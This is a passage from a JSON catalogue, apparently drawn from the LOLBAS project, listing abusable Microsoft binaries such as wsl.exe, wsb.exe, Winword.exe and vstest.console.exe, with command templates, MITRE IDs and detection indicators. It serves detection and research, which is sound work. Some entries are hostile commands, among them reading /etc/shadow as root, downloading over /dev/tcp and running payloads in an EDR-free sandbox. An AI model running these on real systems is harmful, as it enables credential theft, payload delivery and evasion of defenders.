Vsjitdebugger.exe.","usecase":"Execution of local PE file as a subprocess of Vsjitdebugger.exe.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"}],"references":["https://twitter.com/pabraeken/status/990758590020452353","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"]},{"id":"lolbas:wfmformat-exe:0","toolId":"lolbas:wfmformat-exe","toolName":"WFMFormat.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WFMFormat.exe","description":"Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`. If the file `dumpfile.txt` (any content) exists in the current working directory, no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Child process from WFMFormat.exe"},{"type":"IOC","value":"tracerpt.exe processes located anywhere other than c:\\windows\\system32"}],"references":["https://www.microsoft.com/en-us/download/details.aspx?id=103244","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"]},{"id":"lolbas:wfc-exe:0","toolId":"lolbas:wfc-exe","toolName":"Wfc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"wfc.exe {PATH_ABSOLUTE:.xoml}","description":"Execute arbitrary C# code embedded in a XOML file.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"]},{"id":"lolbas:windbg-exe:0","toolId":"lolbas:windbg-exe","toolName":"WinDbg.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"windbg.exe -g {CMD}","description":"Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"]},{"id":"lolbas:winproj-exe:0","toolId":"lolbas:winproj-exe","toolName":"WinProj.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"WinProj.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a WinProj command line"},{"type":"IOC","value":"WinProj making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"]},{"id":"lolbas:winword-exe:0","toolId":"lolbas:winword-exe","toolName":"Winword.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winword.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"]},{"id":"lolbas:wsb-exe:0","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><LogonCommand><Command>{CMD}</Command></LogonCommand></Configuration>\"\nwsb exec -r System --id YOUR_ID","description":"Executes the given command in a Windows Sandbox from an inline XML configuration with an embedded `<LogonCommand>`, leaving no `.wsb` file on disk. Note: `<LogonCommand>` only fires once `WDAGUtilityAccount` actually logs in, which only happens after an RDP session is established via `wsb connect`, so this pattern opens a visible Sandbox window.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment whose host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsb-exe:1","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><MappedFolders><MappedFolder><HostFolder>{PATH_ABSOLUTE:folder}</HostFolder><ReadOnly>false</ReadOnly></MappedFolder></MappedFolders></Configuration>\"\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy C:\\users\\WDAGUtilityAccount\\Desktop\\Temp\\{PATH} {PATH}\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted under `C:\\users\\WDAGUtilityAccount\\Desktop` with the same folder name as the source folder. This allows, for example, for copying payloads from the host system into the sandbox (seen here), copying payloads from the sandbox back to the host system, or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsb-exe:2","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start\nwsb share --id YOUR_ID -f {PATH_ABSOLUTE:folder} -s c:\\SOME_FOLDER --allow-write\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy {PATH_ABSOLUTE} c:\\SOME_FOLDER\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted at `c:\\SOME_FOLDER`. This allows, for example, for copying payloads from the host system into the sandbox, copying payloads from the sandbox back to the host system (seen here), or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsl-exe:0","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -e /mnt/c/Windows/System32/calc.exe","description":"Executes calc.exe from wsl.exe","usecase":"Performs execution of specified file, can be used to execute arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:1","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -u root -e cat /etc/shadow","description":"Cats /etc/shadow file as root","usecase":"Performs execution of arbitrary Linux commands as root without need for password.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:2","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe --exec bash -c \"{CMD}\"","description":"Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)","usecase":"Performs execution of arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:3","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'","description":"Downloads file from 192.168.1.10","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:4","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe","description":"When executed, `wsl.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:xbootmgr-exe:0","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -callBack {PATH:.exe}","description":"Executes an executable after the trace is complete using the callBack parameter.","usecase":"Executes code as part of post-trace automation flow.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"]},{"id":"lolbas:xbootmgr-exe:1","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -preTraceCmd {PATH:.exe}","description":"Executes an executable before each trace run using the preTraceCmd parameter.","usecase":"Executes code as part of pre-trace automation or staging.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"]},{"id":"lolbas:xbootmgrsleep-exe:0","toolId":"lolbas:xbootmgrsleep-exe","toolName":"XBootMgrSleep.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgrsleep.exe 1000 {PATH:.exe}","description":"Execute executable via XBootMgrSleep, with a 1 second (=1000 milliseconds) delay. Alternatively, it is also possible to replace the delay with any string for immediate execution.","usecase":"Performs execution of specified executable, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"]},{"id":"lolbas:devtunnel-exe:0","toolId":"lolbas:devtunnel-exe","toolName":"devtunnel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"devtunnel.exe host -p 8080","description":"Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet.","usecase":"Download Files, Upload Files, Data Exfiltration","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml"},{"type":"IOC","value":"devtunnel.exe binary spawned"},{"type":"IOC","value":"*.devtunnels.ms"},{"type":"IOC","value":"*.*.devtunnels.ms"},{"type":"Analysis","value":"https://cydefops.com/vscode-data-exfiltration"}],"references":["https://code.visualstudio.com/docs/editor/port-forwarding","https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"]},{"id":"lolbas:dotnet-counters-exe:0","toolId":"lolbas:dotnet-counters-exe","toolName":"dotnet-counters.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-counters.exe collect --duration 1 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting performance counter data for 1 second.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-counters collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-counters","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"]},{"id":"lolbas:dotnet-trace-exe:0","toolId":"lolbas:dotnet-trace-exe","toolName":"dotnet-trace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-trace.exe collect --duration 00:00:01 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting runtime trace data for 1 second during execution.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-trace collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-trace","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"]},{"id":"lolbas:vsls-agent-exe:0","toolId":"lolbas:vsls-agent-exe","toolName":"vsls-agent.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}","description":"Load a library payload using the --agentExtensionPath parameter (32-bit)","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml"}],"references":["https://twitter.com/bohops/status/1583916360404729857","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"]},{"id":"lolbas:vstest-console-exe:0","toolId":"lolbas:vstest-console-exe","toolName":"vstest.console.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"vstest.console.exe {PATH:.dll}","description":"VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general","usecase":"Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"vstest.console.exe spawning unexpected 